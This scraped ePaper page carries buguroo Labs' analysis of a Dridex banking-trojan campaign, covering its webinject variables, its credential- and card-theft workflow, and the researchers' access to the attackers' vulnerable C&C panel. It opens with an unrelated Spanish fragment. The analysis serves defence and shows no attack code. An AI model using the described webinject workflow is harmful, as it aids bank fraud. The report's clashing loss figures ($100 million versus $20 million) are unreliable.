eslabón más débil




Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.


Analysis of Latest Dridex Campaign Reveals

Worrisome Changes and Hints at New Threat

Actor Involvement

En el informe del instituto Ponemon “2015 Cost of Cyber Crime Study:-

Global” se ha cifrado el coste medio del ciberfraude para una compañía

en 7,7 millones de dólares lo que sigue poniendo de manifiesto

el imparable crecimiento de este negocio en los últimos años.

Además también se concluye que el sector financiero vuelve a ser el sector

más afectado por estos ataques situándose en casi 13,5 millones de

dólares de pérdidas de media por compañía. Esta conocida tendencia al

alza en el cibercrimen es el origen de un incremento en la inversión en

seguridad por parte de las compañías. Sin embargo esta mayor inversión

no logra frenar a los ciberdelincuentes ¿por qué el resultado de esta inversión

no es directamente proporcional al descenso de las pérdidas?

La respuesta a esta pregunta se sustenta en dos pilares:

• Las amenazas son más avanzadas y el paradigma de la seguridad

ha cambiado de modo que las soluciones convencionales basadas

en firmas o ataques conocidos sobre activos tecnológicos de la compañía

no son suficientes, es necesaria una capa adicional de protección

• Los ataques contra entidades financieras se han dirigido

al compromiso del usuario final. Casi el 98% de las compañías

reconoce haber sufrido ataques de malware, y el 60 % reconoce

haber sufrido ataques de Phishing. La mayoría de compañías

no tiene soluciones de protección integral fuera del perímetro.

El usuario, el

eslabón más débil

La sociedad actual en la que cualquier persona dispone de dispositivos

electrónicos con los que realizar sus gestiones con la banca de manera cómoda

y rápida ha provocado un cambio en el paradigma de la seguridad

WebFraud Defense 1



A recent investigation taking place at buguroo Labs throughout the last

month gives us surprising insights into the latest Dridex campaigns. In

this article, we are not going to cover information related to how Dridex

works, how it is spread or which sophisticated mechanisms are used in

order to avoid detection and mitigation from the “good guys.”

We are going to show that something is changing in how the Dridex

infrastructure is being used. Suddenly and surprisingly, this ultrasophisticated

malware, which is targeting the most important companies

around the world and turning their security upside down, also has its own

code vulnerabilities. These vulnerabilities allow us to analyze impact of

the new Dridex campaigns from a different point of view, based on the

data it has stolen, not just its detection ratio.

Key Findings

• The Dridex infrastructure is not invulnerable. Some of the gate

URLs that are part of the 220 subnet can be exploited. Ultrasophisticated

malware has crude vulnerabilities.

• Analysis shows Dridex’s latest campaign has added new

targets on its compromising workflow. It is built to steal

credit card information using an Automatic Transfer System

(ATS) mechanism. From compromising users’ credentials

to hijacking end-users’ sessions in order to transfer money

directly to fraudulent mule accounts, Dridex covers a lot of

options to compromise victims’ data.

• In just this one subnet campaign, Dridex’s panel has

compromised data from more than 100 countries and has

credit card data affecting more than 900 entities. It is much

more than we expected and shows a worrying increase of the

malware’s scope.

• Despite 70 percent of the stolen credit cards recovered being

associated with English-speaking issuing organizations,

around 85 percent of entities affected are located in non-

English-speaking countries. The number of victims in the

Middle East, Africa and Latin America is increasing widely, so

Dridex can be considered a global threat.

buguroo 2


• During one 10-week period, attackers are estimated to

have launched multiple campaigns with the 220 subnet,

potentially compromising more than 1 million credit cards

with approximately $100 million in estimated financial losses.

• Dridex infrastructure is being used to distribute Locky



In January 2016, we detected some alerts from a customer that has

deployed our endpoint protection mechanism, bugFraud Defense. Among

those alerts, we found a victim affected by a new malware that seems

to be an evolution of Dridex’s conventional campaigns. After analyzing

that sample and probing how the malware was using its infrastructure,

webinject revealed a vulnerability on a Dridex gate URL.

With the information obtained, buguroo was able to analyze and calculate

the scope of one of Dridex’s new campaigns. By carefully evaluating how

the cybercrime is organized and how Dridex is distributed by massive

spam campaigns, we were able to estimate how much this attack could

cost financial entities.

Webinject Static


Our bugFraud Defense solution gave us the entire JavaScript that was

running on our financial entity victim, and that allowed us to analyze

deeply what the attack consisted of. In this case, the webinject included

in the victim’s browser was quite similar to any other from the same

malware campaign on the Internet. It has a script that invokes a remote

server in order to download the final JavaScript that is going to modify

the legitimate website content when the victim is navigating through it.

buguroo 3


This mechanism is known as an Automatic Transfer System (ATS). The

use of this mechanism allows attackers to have a service based on the

creation and maintenance of updated, personalized webinjects for

every target entity. So, the attack infrastructure is more fragmented,

and therefore, its mitigation is increasingly difficult. The development

highlights the Malware-as-a-Service concept.

However, improving the uptime or “realive” of the attacks is not the main

benefit of these mechanisms. The main benefit is based on advanced

functionalities, like the creation of injections interacting with post-login

pages. The victim cannot notice the infection or the damage it is causing,

and in fact, tends to unconsciously interact in favor of the attacker. The

samples used in those developments are shown below to provide a better

understanding of the performance:

buguroo 4


During our analysis period, we were able to detect three different ATS

Panels, which were enabled with Dridex malware infrastructure behavior.

Gate URL

Detected time

https://XXXXXXXol.name/adm/gate/ 27/01/2016

https://XXXXXXXna.com/facebookapi/gate/ 29/02/2016

https://smXXXXXXXXXX.com/facebookapi/gate/ 09/03/2016

Source Code


After downloading the Javascript’s source code, we found that it was an

obfuscated code, so we were requested to de-obfuscate and clean it in

order to make the data more readable. We used some static and dynamic

methodologies for this purpose.























buguroo 5


Interesting Variables

During our analysis we found different code variables that helped

us understand the final purpose of this JavaScript: to steal banking

credentials. The most important variables are listed below:

• gateURL: URL path related to the gate. It is the drop zone where

the Javascript sends compromised data, and it is also used

for recovering necessary data for the malware functionality. (


• adminka_path: URL path related to the command and control

panel. It is the place where the botnet administrator can log in

to review the data(https://*****.***/adm/)

• bank_id, bank_folder_name: Affected entity

• account_id: stolen account ID

• transfer_info, all_transfers_info: All the information related to

account transfers

• mob_info: Mobile-related info. It could be used for bypassing

second-layer authentication

• login_node, pass_node: User credentials

Variable initialization

buguroo 6


Interesting Functions

We can confirm, after analyzing all of the code, that this was done by

professional developers as it contains more than 8,000 code lines,

including more than 100 functions with specific purposes. Some of the

features that are included in this extensive code can:

• Modify HTML content and show it to the end-user

• Parse and validate user credentials

• Connect with the Gate server

• Check different protection mechanism deployed by each


• Manage and follow Bot workflow in an easy way

Examples of functions

buguroo 7


Webinject Behavior


This campaign’s webinject is able to interact with the financial entity

hijacking the victim’s browser. The workflow this JS uses is as follows:

1. First, it initializes and replaces the variables related to

the Gate URL and the C&C URL; both are important in the

subsequent communication processes.

2. Secondly, the JS checks if the victim is browsing the targeted

entity login page.

3. If so, the JS modifies the HTML in order to steal the user’s


4. If not, the JS shows an HTML file to keep the user waiting

while it checks if the victim is on the Main Page or on the

Account Details Page.

a. Main Page behavior: The JS steals the account balance

and holder name. It also logs internal status and account

number. In addition, it does some checks in order to abort

or continue the execution workflow.

buguroo 8


b. Account Details Page behavior: At the beginning, JS parses

the website looking for personal information. Depending on

the user status, the JS is also able to show an HTML form to

request the victims’ personal data or to request their credit

card data. All the information gathered is sent to the gate

URL previously configured.

5. Check if the compromised data is fake or not. JS is able to

verify credit card numbers with the Luhn algorithm, etc.

buguroo 9



Compromised Data from

the C&C Panel

After research through our first JS detection, we found where the C&C login

panel was hosted. It appears like the image below.

Using this information in addition to the information obtained from our

JavaScript analysis and searching the Intel Big Data from buguroo Labs,

we noticed some coincidences between this panel and others we already

had detected in the past.

Looking deeply into the panel responses, we found that this panel version

was vulnerable, and we were able to recover part of the compromised


Discovering the


Testing how the panel responded to some of our requests and matching

this information with the JavaScript code information, we found that

there are a lot of variables that are not under any validation mechanism.

This way, we were allowed to recover most of the victims’ data.

buguroo 10



Server response with internal data

Analyzing Recovered


Recovered information has a specific structure that matches perfectly

with the content that is requested by the attackers’ HTML.

• Account.

• Holder name.

• Last login date.

• Card number.

o Card country.

o Card bank.

o Card type.

After analyzing the data in its entirety, we came to the following


1. There is an increase in the victims around the world. European

and English-speaking countries are still the main targets,

but it is significant to find credit cards related to African and

Latin American companies.

buguroo 11


2. After processing all the data contained in the attackers’ Web

panel, we were able to recover around 16,000 unique credit

card records. While this may not seem like a huge amount,

we need to consider this is just one part of just one Dridex

campaign. As it is said in the “Dridex: Tidal waves of spam

pushing dangerous financial Trojan” report from Symantec,

during the same period of time (10 weeks), 145 different

campaigns of Dridex were found, and nearly 40 percent of them

were related to the 220 subnet. This approximation allows us

to estimate the global cost of the Dridex 220 subnet at around

$20 million in profits, in just a 10-week period---supposing one

out of 10 credit cards work and can be used by the attackers

and considering $500 of average stolen money per account.

buguroo 12



It is quite rare to find an ultra-sophisticated malware like Dridex using

foreign infrastructure that can be compromised easily, allowing anyone to

get the data that malware has exfiltrated. This could support a hypothesis

that after October’s takedown, Dridex malware is being used for different

cyberattackers’ groups that are not necessarily the ones who developed

the first Dridex versions.

buguroo 13


It also supports a pattern we have seen in other examples like Dyre— how

cyberattacker groups evolve their strategies as their product lifecycle

matures. First, they create a new malware and use it themselves. After

some time, they sell it to other groups in the black markets. And eventually,

these others share or leak the code to the underground community.

This raises interesting possibilities. Is Dridex now being used by less

professional groups, as evidenced by the exceedingly rare vulnerability

of a C&C server to a basic attack? Is Dridex going to be the next massively

accessible malware like Zeus was in the past?

At the moment, two things are clear. The Dridex infrastructure is ramping

up its targeting of credit card and financial data, and it is being used to

massively distribute a new threat: Locky ransomware.

About buguroo

buguroo is a company of bug gurus redefining cybersecurity with a series

of recently announced next-generation IT security platforms. A U.S. startup

and spinoff of Deloitte’s European Security Operations Center (SOC), the

company introduced bugThreats, a threat intelligence platform (TIP)

that uses aggressive techniques to hack the hackers and mine relevant

threat data from the Dark Web and the surface Web to deliver actionable



• David García Muñoz

• José Carlos Corrales Casas


• Elisabet Fernández Cerro

buguroo 14


buguroo 15



Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!